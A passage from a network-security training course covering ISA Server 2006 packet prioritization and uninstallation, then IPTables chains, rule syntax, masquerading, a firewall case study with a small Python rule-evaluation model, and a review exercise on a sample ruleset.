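    print(priority_for("http://brokeragehouse.securitycertified.net/quotes"))
```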
TASK 5B-20
Configuring Packet Prioritization
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed the previous tasks.
1. Choose Start→All Programs→Microsoft ISA Server→ISA Server Management.
2. Expand the Console Tree pane, expand Configuration, and select the General container.
3. In the Details pane, under Global HTTP Policy Settings, select Specify DiffServ Preferences.
Note on the Security Configuration Wizard (Task 5B-19): This wizard only makes configuration changes. It does not apply security patches or updates. You must also make sure your OS is kept up-to-date with the latest patches.
4. In the HTTP DiffServ dialog box, select the Enable Network Traffic
Prioritization According To DiffServ (Quality Of Service) Bits option.
5. Click the Priorities tab and then click Add.
6. In the Add Priority dialog box, in the Priority Name field, type Branch Office Priority and then in the DiffServ Bits field, type 010100 and click OK. (The DiffServ bits value would correspond to the value set on your routers.)
7. Click the URLs tab and then click Add.
8. On the Add URL Priority tab, in the URL field, type brokeragehouse.securitycertified.net.
9. On the Add URL Priority tab, from the Priority drop-down list, select
Branch Office Priority and then click OK.
10. In the HTTP DiffServ dialog box, click the Network tab, select the Exter-
nal network, and then click OK.
11. In the dialog box warning you that DiffServ is currently disabled, click Yes.
12. At the top of the Details pane, click Apply.
13. In the Saving Configuration Changes dialog box, click OK.
14. Close the ISA Server 2006 Management console.
The ISA Server 2006 DiffServ filter is now enabled and configured to prioritize HTTP packets sent to the URL http://brokeragehouse.securitycertified.net.
Uninstalling ISA Server 2006
Like most Microsoft programs, ISA Server 2006 is relatively easy to uninstall. The methodology for uninstalling is similar to most programs and is accomplished through the Add/Remove Programs control panel applet. One thing to keep in mind is that in addition to removing ISA Server 2006, you may also need to change the security configuration of the underlying OS before you can use the
server for a different purpose. However, as you discovered in an earlier exercise, the Security Configuration Wizard makes this process relatively painless. Just roll back the configuration that you used for ISA Server and apply the template that is appropriate for the server's new role on your network.
TASK 5B-21
Uninstalling ISA Server 2006
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed the previous tasks.
1. Choose Start→All Programs→Control Panel→Add Or Remove Programs.
2. In the Currently Installed Programs list, select Microsoft ISA Server 2006
and then click Change/Remove.
3. When the Microsoft ISA Server 2006 - Installation Wizard dialog box
appears, click Next.
4. In the Program Maintenance window, select the Remove radio button and
then click Next.
5. In the Generated Files Removal dialog box, accept the defaults, and click
Next.
6. In the Remove The Program dialog box, click Remove.
7. In the Installation Wizard Completed dialog box, click the Finish button.
8. Close the Add Or Remove Programs control panel applet.
9. Choose Start→Administrative Tools→Security Configuration Wizard.
10. In the Welcome To The Security Configuration Wizard, click Next.
11. In the Configuration Action dialog box, select the Rollback The Last Applied Security Policy option and then click Next.
12. In the Select Server dialog box, verify your server name and then click Next.
13. In the Rollback Security Configuration dialog box, click Next. (If you wish, you may view the rollback file before clicking Next.)
14. In the Completing The Security Configuration Wizard dialog box, click Finish.
15. You have successfully removed ISA Server 2006 and the security configuration from your server.
16. Choose Start→Control Panel, right-click Network Connections, and choose Open.
17. Right-click each of the loopback adapters and choose Disable.
18. Close the Network Connections window.
19. If you would like to confirm that these connections are disabled, attempt to ping them from a command prompt. You should not receive a response.
20. Close all open windows.
Topic 5C
IPTables Concepts
One of the primary benefits touted for the Open Source model of Linux is its ability to adapt and change as people come up with bright ideas. This ability has allowed security features to be created and modified as industry requirements and Internet threats evolve. Linux can behave as a router, a NAT device, and a packet-filtering firewall, and all of these features are built into the kernel.
Firewalling in Linux
Elementary firewalling via a tool called ipfwadm was included in the 2.0 kernels. With kernel version 2.2, the firewall was built with IPChains. From kernel version 2.4 onward, IPChains is replaced with IPTables, the userspace front end to the kernel's netfilter framework. One of the big differences between IPChains and IPTables is that the latter can track connections and so act as a stateful packet filter.
At its very essence, the way that IPTables works is extremely simple. The headers of a packet are examined against an ordered list of rules (referred to as a chain), in sequence. If the packet matches a rule, a decision is made for that packet based on what that rule specifies (referred to as the target). If a match is not found, the packet is examined against the next rule in the sequence. This continues until the rules are exhausted; at that point, IPTables applies the chain's default policy.
As a packet-filtering firewall, IPTables checks its rules on packets as they enter or leave an interface. Because the filtering itself is done inside the kernel (the iptables command only loads the rules), the processing of packets is very fast. One form of NAT that IPTables performs, hiding a whole network behind the address of the outgoing interface, is referred to as masquerading.
Essentially, there are three tables that are part of IPTables: filter, nat, and mangle. This topic deals mostly with the filter table. The nat table is used when IP addresses need to be substituted, typically to hide internal hosts from the Internet. The mangle table is used when certain fields in the headers need to be changed, such as the TTL or TOS fields.
Depending on the table chosen, you can manipulate certain built-in chains. For example, built into the filter table are three chains that cannot be deleted: INPUT, FORWARD, and OUTPUT. If you are dealing with the nat table, you will work with the PREROUTING and POSTROUTING built-in chains (and an OUTPUT chain for packets generated locally).
If a packet is addressed to the firewall itself, the INPUT chain is used to determine its fate as it enters via an interface. If a packet originates at the firewall, the OUTPUT chain is checked. When the packet requires routing to another host, the FORWARD chain is used.
If the packet reaches the end of one of the chains and there has been no match, whatever default policy exists is used. Default policies exist only on the built-in chains, and the choices are ACCEPT and DROP. You set the default policy for the built-in chains to one of the above, and in the absence of any matching rule, the action stated by the default policy is carried out. If a rule matches a packet, the appropriate action is carried out. The action to be taken when a match is found is also referred to as the target. The target could be ACCEPT or DROP, or even another chain altogether.
Apart from the built-in chains, a firewall administrator can create user-defined chains, identified by a name. Unlike the built-in chains, user-defined chains do not have a default policy. If a packet reaches the end of a user-defined chain without any decision having been made about it, the packet returns to the chain that was examining it previously and continues with the next rule in that chain.
Process of the Packet
As far as the network interfaces on a firewall are concerned, all packets are either inbound or outbound. Typically, the majority of packets received by an interface on a firewall are passed on to another interface to be sent onward. At such a time, the firewall has to decide how the packet is going to be passed on to the other interface. Packets might be simply routed from one interface to the other (forwarded), or certain information in the packet headers might have to be stripped, replaced with new information, and then sent onward, as with NAT (masquerade/de-masquerade).
To be able to use IPTables, the kernel must be compiled to include support for firewalling (netfilter). In this course, the version of Linux used is SUSE Enterprise Server 10, which includes IPTables. If you are using a different Linux distribution, you will need to verify that IPTables has been installed; if it has not, you will have to install it.
The following set of figures (the circle represents a Linux box with three interfaces) show the basic movement of packets through a system running IPTables. First, let's look at inbound flow, in the following figure.
Figure 5-23: A packet's inbound flow.
Figure 5-24: A packet's outbound flow.
Finally, let's look at routing and NAT flow. The following figure shows packets being routed, or forwarded.
Figure 5-25: A packet's routing (forwarding) or NAT (masquerading/de-masquerading) flow.
Figure 5-26: The multiple decisions that have to be made about a packet by a firewall.
When a packet first enters an interface, the kernel verifies the IP header checksum and performs basic sanity checks that discard malformed packets. The routing decision is made next, and it determines which chain the packet traverses. A packet addressed to the firewall itself is passed through the INPUT chain, and only that chain, before it is handed to a local process (one that can send and receive packets). A packet addressed to another host is passed through the FORWARD chain, and only that chain, before it is sent out of the appropriate interface; it never traverses INPUT or OUTPUT. The OUTPUT chain examines packets generated by processes on the firewall itself. In each chain the packet moves down the rules in order; the first matching rule specifies where the packet should go, and if nothing matches, the chain's default policy takes effect.
The Flow of the Chains
Upon entering an interface, a packet destined for the firewall is processed by the INPUT chain. The packet is passed down the list, one rule at a time, until a match has been found. When there is a match, the packet follows the rule's target. The target specifies what will become of the packet, as far as that rule is concerned. For example, the target might state that the packet is accepted or dropped, or it could name a user-defined chain. A rule in one user-defined chain can specify another user-defined chain as its target.
Figure 5-27: The Input chain accepting a packet at the third rule.
The target names are straightforward: ACCEPT and DROP. Two further targets are in everyday use: LOG and REJECT. A small clarification is needed on the difference between DROP and REJECT. As with Microsoft's ISA Server, the end result, as far as the packet is concerned, is that it does not get through. However, TCP/IP communication is normally two-way. When the target is DROP and a matching packet is found, that packet is silently discarded: the sender gets no feedback at all and has to wait out its own retransmission timers before it can conclude that nothing is listening. When the target is REJECT, the packet is still discarded, but an error is returned to the sender, by default an ICMP port-unreachable message, or a TCP reset if the rule specifies --reject-with tcp-reset, so the sender's connection attempt fails immediately instead of hanging. The choice is yours to make. REJECT is the polite way to refuse a packet and makes troubleshooting easier; from a security standpoint, DROP gives an outside scanner less information and costs it time. A rule with no target only counts the packets it matches, so every rule that is meant to decide something needs a target, and because rules are evaluated in sequence and the first match wins, it is critical that the correct order be maintained. You do not want an error in the rule order to mistakenly block a subnet or grant access where it should not be granted. If the built-in chains alone do not provide the level of control that is required, administrators can create their own chains and apply detailed rules to them.
Please note that the method of checking packets against the built-in chains in IPTables is very different from the method employed by IPChains: in IPChains a forwarded packet passed through the input, forward, and output chains in turn, whereas in IPTables it traverses only the FORWARD chain.
Figure 5-28: The Input chain finds a match and targets the packet to a user chain.
Configuring chains can quickly become an involved task. For example, the INPUT chain receives a packet and finds a match on the fourth rule, sending the packet to a user chain. That same packet then goes through the user chain, where there might be a match sending it to a different chain, or even back to the INPUT chain. Remember, if a packet does not match any of the rules in a user-defined chain, it is sent back to the previous chain, where it picks up at the rule after the one that sent it to the user-defined chain in the first place; see the following figure.
Figure 5-29: A packet being examined by first the Input chain, then a user-defined chain, and going back to the Input chain.
It is possible for an administrator to write rules that would cause packet examination to loop, for example two user-defined chains that jump to each other. The kernel checks for this when the rules are loaded and refuses such a ruleset (iptables reports a loop in the table), so a live packet never ends up in the loop; do not rely on the packet simply being dropped.
Configuration Options
This section covers the configuration options most often used in day-to-day environments running IPTables. Not all of the options available in IPTables are covered here. For a more detailed study of IPTables, you should look around at the various sources of information available to you. To start with, the man pages for IPTables are quite extensive and worth reading. For detailed syntax issues that are not covered here, issuing the man iptables command is a good place to start. If you do not have a Linux box handy, go to www.iptables.org or www.netfilter.org and read or download articles dealing with setting up a Linux box as a firewall by using IPTables.
There are configuration options for creating, viewing, and managing chains. The command switch that selects the operation on a chain (-N, -P, -F, and so on) is uppercase. The command switches that manage the individual rules (-A, -D, -I, and so on) are also uppercase. Within a rule, the match options (-p, -s, -d, and so on) are lowercase.
The iptables Command
The basic syntax of the command is:
iptables command_switch parameters [options]
The following figure shows an example of an IPTables command.
Figure 5-30: Sample command syntax for IPTables.
Cisco gurus will quickly latch on to the syntax similarities between IPTables and Cisco Access Control Lists. Basically, you're dealing with some conditions, and if those conditions are met, then this rule says, "Accept the packet." The following figure shows several examples of usage syntax.
Figure 5-31: Examples of usage syntax for IPTables.
Chain Management
The following table lists some of the command switches for managing the chains.
(Italicized words are variables.)
Figure 5-32: Chain management command switches.
Figure 5-33: Available options for IPTables.
Rule Management
The basic structure for the rule commands is the same as for the chain commands, as shown in the following table.
Figure 5-34: Example rule commands.
Rule Creation
The previous command switches are used in managing the rules, and they are in uppercase. The following table lists the options for creating the actual rules themselves.
Figure 5-35: Rule creation commands.
Figure 5-36: Conguration options for rules in IPTables.
Other Options
In the rule sets, port numbers are configured as two values, source port, or sport, and destination port, or dport. For example, if you want a rule to govern source ports 2100 through 2200, inclusive, you can use the syntax --sport 2100:2200. Notice that two hyphens are used. Similarly, if you want a rule to address destination port 31337, you can use the syntax --dport 31337. Port matches are only meaningful together with -p tcp or -p udp.
Another very useful and important rule configuration tool is the bang (!) entry. This value, with spaces on either side, negates whatever follows it. Think of a rule as being divided into a number of fields that more or less correspond to the headers in a packet. Now, imagine that each of these fields can have certain specifications. Sometimes you might want to negate what's specified (anything but this). This is where the ! comes in. The ! negates the value specified in that field. For example, the syntax to specify any host other than 172.16.23.44 is ! 172.16.23.44. In the IPTables version used in this course the ! is written after the option, as in -s ! 172.16.23.44; newer versions of iptables require it before the option, as in ! -s 172.16.23.44, and reject the older form.
While discussing IP addresses in IPTables, the ability to specify any IP address is included as well. To do so, you can use 0/0 (or 0.0.0.0/0).
When choosing to block ping packets, or more specifically ICMP packets, be careful that you are blocking what you mean to block. Because the ICMP protocol is used for many different parts of communication, it is important that you are aware of what could happen if you blocked all ICMP traffic: host-unreachable messages would not come through, source-quench messages would not come through, time-exceeded messages would not come through, and so forth. You need to specify the part of ICMP you want to work with, just as you specify ports for TCP. The syntax is -p icmp --icmp-type typename, where typename is one of the following (the names are lowercase; iptables -p icmp -h lists them all):
destination-unreachable
source-quench
time-exceeded
parameter-problem
echo-request
echo-reply
There are several other switches that can be used; again, check the man pages for a comprehensive list. One more that is worth mentioning is logging. Where IPChains had a -l option, IPTables logs through a target: -j LOG. LOG is a non-terminating target, so a matching packet is written to the kernel log (with an optional --log-prefix to tag the entry) and then continues down the chain to the next rule, which must still decide whether to accept or drop it. A rule given no -j at all does nothing except increment its packet and byte counters, which is useful for tracking purposes, such as counting the packets that arrive for a particular service on a given host (iptables -L -v shows the counters).
To save your IPTables configuration, use iptables-save, which writes the current ruleset to standard output, so redirect it to a file: iptables-save > filename. To restore this configuration, feed the file to iptables-restore: iptables-restore < filename. Rules loaded with the iptables command live only in the kernel's memory and are lost at reboot, so the saved file must be restored at boot time; how the distribution arranges this varies.
Rule Examples
So that the syntax can make a bit more sense, we will look at some rule
examples in their syntax form, and discuss the result of each rule. By the time
you reach the end of this section, you should have a solid grasp of the IPTables
syntax.
Modifying a Default Chain
A simple start to working with the syntax is to modify the behavior of a default
chain. As you remember, there are only three default chains: Input, Output, and
Forward. In this example, we will modify the setting of the default Input chain to
change the default setting to Drop. This is a common modication of the chain,
and is a requirement for a secure system. You do not want to keep the default of
Accept on the Input chain. The syntax to accomplish this is:
iptables -P INPUT DROP
For this chain:
-P sets the default policy of a specied chain.
INPUT is the chain that is getting modied.
DROP is the target.
Therefore, the default policy of the INPUT chain is now set to drop all packets. If this is the only configuration of the INPUT chain, then all packets trying to reach the firewall will be dropped! You must create rules with targets other than DROP if you want communications to take place at all; if you are working over a remote session, add the rule that accepts your own session before changing the policy, or you will lock yourself out.
The end result of this modification is that when a packet reaches the end of the INPUT chain, it will be discarded. Because the default setting of ACCEPT can present a security risk, changing the setting to DROP is a good idea from a security perspective.
Creating a Chain
If you need to create a new chain, the syntax is:
iptables -N chainname
For this chain:
-N indicates that this is a new chain.
chainname is the name of the new chain.
Deleting a Chain
To delete a chain, use the syntax:
iptables -X chainname
For this chain:
-X indicates that you want to delete a user-defined chain (the built-in chains cannot be deleted).
chainname is the name of the chain that you want to delete.
A chain cannot have any rules in it prior to deletion, and no rule in another chain may still jump to it. If rules exist, you can use the Flush command.
Flushing a Chain
If you need to delete a chain, and there are still rules in the chain, you can first flush the chain. Because flushing removes all rules from a chain, be careful that you do not perform something unexpected; flushing a built-in chain leaves only its default policy, so with a DROP policy all traffic stops. Plan carefully when deleting chains, particularly on a production machine. To flush a chain, use the syntax:
iptables -F chainname
For this chain:
-F indicates that you want to flush all rules.
chainname is the name of the chain that you want to flush.
Checking for Connections
If you want to be sure that inbound packets are not trying to establish connections, you can check the SYN flag. On its own, this flag is set only on the first segment of the three-way handshake; --syn matches TCP segments with SYN set and ACK, RST, and FIN clear. Checking for this flag is a good way to keep inbound connections from passing through the rule sets while leaving the same port open for return communication. To check for connections, use the syntax:
iptables -A chainname -p TCP -s 10.0.10.10 --syn -j DROP
For this chain:
-A indicates that you want to append a rule to a chain.
chainname is the name of the chain that you want to add the new rule to.
-p indicates that you want to check a protocol.
TCP defines the protocol that you want to check.
-s indicates that you want to check a source address.
10.0.10.10 is the source IP address that you want to check.
--syn indicates that you want to check the SYN flag.
-j indicates that you want to define a target for matches.
DROP defines the target.
The meaning of this rule is "A packet coming from 10.0.10.10 that is trying to initiate a connection is to be dropped."
Negating Values
Here is an example of syntax that negates a value:
iptables -A OUTPUT -p TCP -d ! 172.16.35.40 --dport 80 -j ACCEPT
For this chain:
-A OUTPUT specifies that you want to append a rule to the OUTPUT chain.
-p TCP indicates that you want to check the TCP protocol.
-d 172.16.35.40 specifies the destination that you want to check. However, because there is a ! before the destination, the rule is stating any destination other than the specified address. (On newer versions of iptables, write ! -d 172.16.35.40.)
--dport 80 indicates that you want to check for WWW packets.
-j ACCEPT defines the target as Accept.
In essence, this rule states that all TCP packets can get to the WWW service on any computer, except for 172.16.35.40.
The final example of negating that we will look at also introduces the lo option, which is used to define the loopback adapter. Here is the command:
iptables -A INPUT -i ! lo -j DROP
For this chain:
-A INPUT indicates that you want to modify the default INPUT chain by appending a rule.
-i indicates that you want to check an incoming interface, and lo defines the incoming interface that you want to check. The ! negates the definition.
-j DROP defines the target as Drop.
In essence, this rule states that all incoming traffic will be denied, except for traffic on the loopback interface.
Defining a Target
To define a target, use the following syntax:
iptables -A INPUT -s 10.0.10.100 -j DROP
For this chain:
-A INPUT indicates that you want to modify the default INPUT chain by appending a rule.
-s 10.0.10.100 defines the IP address to match.
-j DROP defines the target as Drop.
The meaning of this rule is: All packets that are from the address 10.0.10.100 are to be denied.
Here is another example of defining a target that also includes a port number:
iptables -A INPUT -p TCP -d 0/0 --dport 12345 -j DROP
The meaning of this rule is: All TCP packets that are destined for any IP address on port 12345 are to be denied.
Complex Rules
The different parts of the rules discussed here can be combined to create overall rules as needed. Here are some examples of more complex rules:
iptables -A OUTPUT -p TCP -s 10.0.10.0/24 -d 0/0 --dport 80 -j ACCEPT
This rule for the OUTPUT chain states that any TCP traffic from the 10.0.10.0/24 network and destined for any IP address on port 80 is to be accepted.
iptables -A INPUT -p TCP -s 0.0.0.0/0 -d 10.0.10.0/24 --dport 31337 -j DROP
This rule for the INPUT chain states that any TCP traffic from any IP address destined for the 10.0.10.0/24 network on port 31337 is to be denied.
iptables -A INPUT -p TCP -s 0.0.0.0/0 -d 10.0.10.0/24 --dport 5000:10000 -j DROP
Similar to the previous command, the only syntax difference here is in the port numbers defined. In this rule, all ports from 5000 to 10000 are to be denied.
Configuring Masquerading
Linux has the ability to perform IP masquerading, which is a form of source NAT. It is not difficult to implement, and the syntax is:
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
For this command:
-t nat indicates that you want to configure the nat table.
-A POSTROUTING indicates that you want to append a rule to the chain that is traversed after routing decisions are made.
-o ppp0 indicates the outgoing interface that should be used; in this case, the PPP dialup link.
-j MASQUERADE defines the target; in this case, that the source IP address in the IP header should be replaced by the current IP address of ppp0, with replies translated back. MASQUERADE is meant for interfaces whose address changes, such as a dialup link; for a fixed external address, the SNAT target with --to-source is the equivalent. Masquerading only affects forwarded packets, so IP forwarding must also be enabled in the kernel (net.ipv4.ip_forward = 1).
Case Study
This section involves review of a case study of IPTables in a working environment. In this example, there is a single computer running as the firewall with two Ethernet interfaces. The Ethernet 0 interface (172.168.25.40) goes to the Internet, and the Ethernet 1 interface goes to the internal network. A diagram of the network is shown in the following figure.
Figure 5-37: An example network for firewall implementation.
First, we need to define the overall goals of the firewall. This should be done during the creation of the security policy, and specifically during the creation of the firewall policy.
Firewall Goals
The intended goals of this firewall are:
We have decided to allow ICMP pings (echo requests and echo replies) through the firewall.
We will allow our external clients access to the email server.
Internal clients cannot use email servers on the Internet.
We will allow external clients to reach our web server.
We will block attempts to spoof internal addresses.
Configuration
First, we will configure the default policies to deny all traffic. The -P switch takes the policy name directly, without -j:
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
Next, we will configure user-defined chains. This is done to make the chains easier to work with. For these user-defined chains, us is internal, and them is external:
iptables -N us-them
iptables -N them-us
Next, we will create the jumps for the different networks:
iptables -A INPUT -s 10.0.20.0/24 -d ! 10.0.20.0/24 -j us-them
iptables -A INPUT -s ! 10.0.20.0/24 -d 10.0.20.0/24 -j them-us
In the first line, if the source is us and the destination is not us (that is, them), then the target is the user chain us-them. In the second line, if the source is not us (them), and the destination is us, then the target is the user chain them-us. Note that these jumps hang off the INPUT chain, which on an IPTables firewall sees only packets addressed to the firewall itself; packets relayed between the two interfaces traverse FORWARD instead, so on a firewall that routes for the internal network the same two jumps belong on the FORWARD chain.
Next, we will configure the internal (us) to external (them) chain. We start by defining the general rules:
Allow internal machines WWW access to the outside.
Allow internal machines to be able to ping hosts on the outside.
Disallow all other outgoing traffic.
Once we know our general rules, we can configure the chain:
iptables -A us-them -p TCP -d 0/0 --dport 80 -j ACCEPT
iptables -A us-them -p ICMP -d 0/0 -j ACCEPT
Next, we will configure the external (them) to internal (us) chain. Again, we will define the general rules first:
Allow hosts on the outside WWW access to the Web server.
Allow hosts on the outside to access the email server.
Allow ping.
Block internal address spoofing.
Disallow all other incoming traffic.
Note that allowing ping is for managing a simple network resource in this exercise; in your production environment you would likely not allow ICMP echo through the firewall.
Once we know our general rules, we can configure the chain:
iptables -A them-us -p TCP -d 10.0.20.22 --dport 25 -j ACCEPT
iptables -A them-us -p TCP -d 10.0.20.22 --dport 110 -j ACCEPT
iptables -A them-us -p TCP -d 10.0.20.21 --dport 80 -j ACCEPT
iptables -A them-us -p ICMP -d 10.0.20.0/24 -j ACCEPT
iptables -A them-us -s 10.0.20.0/24 -j DROP
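To make the chain flow concrete, here is an added example, not code from the book or from the netfilter project: a small Python model of the first-match semantics described in this topic (sequential rules, jumps into user-defined chains with fall-through back to the caller, a default policy only on the built-in chains, LOG as a non-terminating target, a rule with no -j as a counter), loaded with the case-study rules above. It attaches the two jumps to FORWARD rather than INPUT because on an IPTables router the packets relayed between the two interfaces traverse FORWARD; the LOG rule for port 31337 and the address 203.0.113.9 (a documentation address standing in for an Internet host) are assumptions added for illustration. The model covers only the filter table and the match options used in this topic, without connection tracking, and is meant for reasoning about rule order, not as a substitute for testing on the firewall itself.

```python
# Toy first-match evaluator for IPTables filter rules: an added example, not the book's code.
# First match decides; a jump into a user-defined chain falls back to the calling chain when
# nothing matches; only built-in chains have a policy; LOG is non-terminating; no -j only counts.
import ipaddress
import shlex
PROTO = {"tcp": 6, "udp": 17, "icmp": 1, "6": 6, "17": 17, "1": 1}
OPTS = {"-p": "proto", "-s": "src", "-d": "dst", "-i": "iif", "-o": "oif",
        "--sport": "sport", "--dport": "dport", "--icmp-type": "icmptype"}

def _net(spec):
    spec = "0.0.0.0/0" if spec == "0/0" else spec          # iptables shorthand for "any"
    return ipaddress.ip_network(spec if "/" in spec else spec + "/32", strict=False)

def _test(key, val, pkt):                                  # one match option; caller applies "!"
    if key == "proto":
        return PROTO[val.lower()] == pkt["proto"]
    if key in ("src", "dst"):
        return ipaddress.ip_address(pkt[key]) in _net(val)
    if key in ("sport", "dport"):
        lo, _, hi = val.partition(":")                     # "5000:10000" is inclusive
        return int(lo) <= pkt.get(key, -1) <= int(hi or lo)
    if key == "syn":                                       # SYN set, ACK/RST/FIN clear
        return pkt["proto"] == 6 and pkt.get("syn", False)
    return pkt.get(key) == val                             # iif, oif, icmptype

def parse_rule(argv):
    # Match options after 'iptables -A chain'; accepts '-s ! addr' (the book) and '! -s addr'.
    match, target, neg, i = {}, None, False, 0
    while i < len(argv):
        tok = argv[i]
        if tok in ("!", "--syn"):
            if tok == "--syn":
                match["syn"] = (None, neg)
            neg, i = tok == "!", i + 1
            continue
        val = argv[i + 1]
        if val == "!":                                     # old form: negation after the option
            neg, val, i = True, argv[i + 2], i + 1
        if tok == "-j":
            target = val
        else:
            match[OPTS[tok]] = (val, neg)
        neg, i = False, i + 2
    return {"match": match, "target": target}

class Firewall:
    def __init__(self):
        self.policy = {c: "ACCEPT" for c in ("INPUT", "FORWARD", "OUTPUT")}  # kernel default
        self.chains = {c: [] for c in self.policy}
        self.logged = []

    def run(self, cmdline):
        """Load one 'iptables ...' command line (-P, -N and -A are supported)."""
        argv = shlex.split(cmdline)
        argv = argv[1:] if argv[0] == "iptables" else argv
        cmd, chain = argv[0], argv[1]
        if cmd == "-P":
            self.policy[chain] = argv[2]                   # 'iptables -P INPUT DROP': no -j
        elif cmd == "-N":
            self.chains[chain] = []
        else:
            assert cmd == "-A", "unsupported: " + cmdline
            self.chains[chain].append(parse_rule(argv[2:]))

    def _walk(self, chain, pkt):
        for rule in self.chains[chain]:
            if not all(_test(k, v, pkt) != neg for k, (v, neg) in rule["match"].items()):
                continue
            t = rule["target"]
            if t == "LOG":                                 # non-terminating: note it and go on
                self.logged.append((chain, pkt))
            if t in (None, "LOG"):                         # no -j: only the counters move
                continue
            verdict = t if t in ("ACCEPT", "DROP", "REJECT", "RETURN") else self._walk(t, pkt)
            if verdict != "RETURN" or t == "RETURN":       # unmatched in a user chain: resume here
                return verdict
        return "RETURN"                                    # fell off the end of the chain

    def verdict(self, chain, pkt):
        v = self._walk(chain, pkt)                         # a policy exists only on built-ins
        return self.policy[chain] if v == "RETURN" else v

def case_study():
    # The book's case study attached to FORWARD: packets relayed between the two
    # interfaces of an IPTables router traverse FORWARD, never INPUT.
    fw = Firewall()
    for line in """
        iptables -P FORWARD DROP
        iptables -N us-them
        iptables -N them-us
        iptables -A FORWARD -p tcp --dport 31337 -j LOG
        iptables -A FORWARD -s 10.0.20.0/24 ! -d 10.0.20.0/24 -j us-them
        iptables -A FORWARD -s ! 10.0.20.0/24 -d 10.0.20.0/24 -j them-us
        iptables -A us-them -p TCP -d 0/0 --dport 80 -j ACCEPT
        iptables -A us-them -p ICMP -d 0/0 -j ACCEPT
        iptables -A them-us -p TCP -d 10.0.20.22 --dport 25 -j ACCEPT
        iptables -A them-us -p TCP -d 10.0.20.22 --dport 110 -j ACCEPT
        iptables -A them-us -p TCP -d 10.0.20.21 --dport 80 -j ACCEPT
        iptables -A them-us -p ICMP -d 10.0.20.0/24 -j ACCEPT
        iptables -A them-us -s 10.0.20.0/24 -j DROP
    """.strip().splitlines():
        fw.run(line)
    return fw
```

A packet is a small dictionary, for example {"proto": 6, "src": "10.0.20.5", "dst": "203.0.113.9", "dport": 25, "syn": True}, and fw = case_study(); fw.verdict("FORWARD", packet) walks it through the chains. Two things the walk makes visible: that packet (an internal host trying an Internet mail server) falls off the end of us-them, returns to FORWARD, and is dropped by the default policy rather than by any rule; and the anti-spoofing rule at the end of them-us can never fire, because the jump into them-us already excludes sources in 10.0.20.0/24, so a spoofed packet is dropped by the policy alone. An anti-spoofing rule keyed on the outside interface (iptables -A FORWARD -i eth0 -s 10.0.20.0/24 -j DROP, placed before the jumps) is the effective control.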
Case Study Summary
After reviewing this case study, you should be able to identify the steps of creating a basic firewall by using IPTables. To summarize:
1. The overall goals and policies of the firewall were identified.
2. The default policies were changed to be very restrictive.
3. New chains were created for ease of management.
4. The INPUT chain was configured to jump to the new user chains.
5. The user-defined chains were configured to conform to the determined settings.
6. The chains were verified with the -L switch.
This study was designed to be a simple example of one possible implementation. Other options that could be added include:
Adding full anti-spoofing, thus blocking any packet arriving on the outside interface that carries an inside source address.
Opening ports for return communication on the high ports.
Adding checks for the SYN option.
Defining IP masquerading.
As you can see, there are always options in firewall design. Chances are good that while the end result may be the same, no two people will configure the firewall in the exact same fashion every time. Rules may be in different orders, for example (as long as they filter properly, of course). Or, perhaps someone is filtering everything on the INPUT chain and not making smaller chains. The flexibility is yours to use as you see fit.
TASK 5C-1
Working with Chain Management
Objective: To review a sample chain, and determine the effect it will have
on traffic.
Setup: The following is an example chain. Review it and identify what has been implemented. Using the space provided, diagram this network and answer the questions that follow.
1. Examine the following chain (the first three lines are the default policies of the built-in chains):
INPUT DROP
FORWARD ACCEPT
OUTPUT ACCEPT
iptables -A INPUT -p 6 -s 0.0.0.0/0 -d 192.20.0.1/32 --dport 23:23 -j ACCEPT
iptables -A INPUT -p 6 -s 0.0.0.0/0 -d 10.168.0.3/32 --dport 80:80 -j ACCEPT
iptables -A INPUT -s 10.168.0.0/24 -d 0/0 -i eth0 -j DROP
iptables -A INPUT -s 127.0.0.0/8 -d 0/0 -i eth0 -j DROP
iptables -A INPUT -s 127.0.0.0/8 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -s ! 10.168.0.0/24 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -p 6 -s 0/0 -d 192.20.0.1/32 ! --dport 23:23 --syn -j DROP
iptables -A INPUT -p 6 -s 0/0 -d 192.20.0.1/32 --dport 1024:65535 ! --syn -j ACCEPT
iptables -A INPUT -p 17 -s 0/0 -d 192.20.0.1/32 --dport 1024:65535 -j ACCEPT
iptables -A INPUT -p 6 -s 0/0 -d 10.168.0.0/24 --dport 1024:65535 -j ACCEPT
iptables -A INPUT -p 17 -s 0/0 -d 10.168.0.0/24 --dport 1024:65535 -j ACCEPT
iptables -A INPUT -p 1 -s 0/0 -d 0/0 -j ACCEPT
iptables -A INPUT -s 10.168.0.0/24 -d ! 192.20.0.1/32 -j ACCEPT
2. Diagram the network here or on another sheet. Assume the Class C address 192.20.0.1 is an external address.
What effect does this set of rules have on the network?
Telnet and web traffic are allowed to defined hosts. Anti-IP-spoofing rules are in place. High ports are open for return traffic.
What services, if any, are running on the internal network?
At least a web service, on 10.168.0.3. (The Telnet service at 192.20.0.1 is on the external address, so it is not an internal service.)
What are the internal clients allowed to access externally?
Web and Telnet services; note that the last rule also accepts any traffic from 10.168.0.0/24 to destinations other than 192.20.0.1, so internal clients are not otherwise restricted by this chain.
Is IP spoofing prevention in place?
Yes.
If an internal client ran a server, would external clients be able to access it? Why or why not?
Not on a well-known port: the only inbound service opened is port 80 on 10.168.0.3. Note, however, that the rules accepting TCP and UDP to 10.168.0.0/24 on ports 1024 through 65535 do not check the SYN flag, so a server listening on a port above 1023 would be reachable from outside.
Topic 5D
Implementing Firewall Technologies
In the previous topics, you were introduced to the concepts and configuration of FireWall-1, ISA Server 2006, and IPTables. In this topic, you will put that knowledge to use.
Scenario
The following conceptualization will be used for configuring the firewall for this scenario. Review the network diagram and the required rules, and then proceed.
Figure 5-38: The conceptual network.
In this activity, you will be creating the configuration first for the internal firewall and then for the external firewall.
Firewall Rules
The following figure represents the policies that have been decided upon for the internal firewall.
Figure 5-39: Internal firewall rules.
The following figure represents the policies that have been decided upon for the external firewall.
Figure 5-40: External firewall rules.
Configuring the Internal Firewall
The IP addresses that will be used for this are listed in the following table.
Use IP Address Subnet Mask
Internal Subnet 172.16.10.0 255.255.255.0
Security Host 172.16.10.10 255.255.255.0
Internal Web Server 172.16.100.100 255.255.0.0
Internal Firewall int 1 172.16.100.1 255.255.0.0
Internal Firewall int 2 192.168.10.1 255.255.255.0
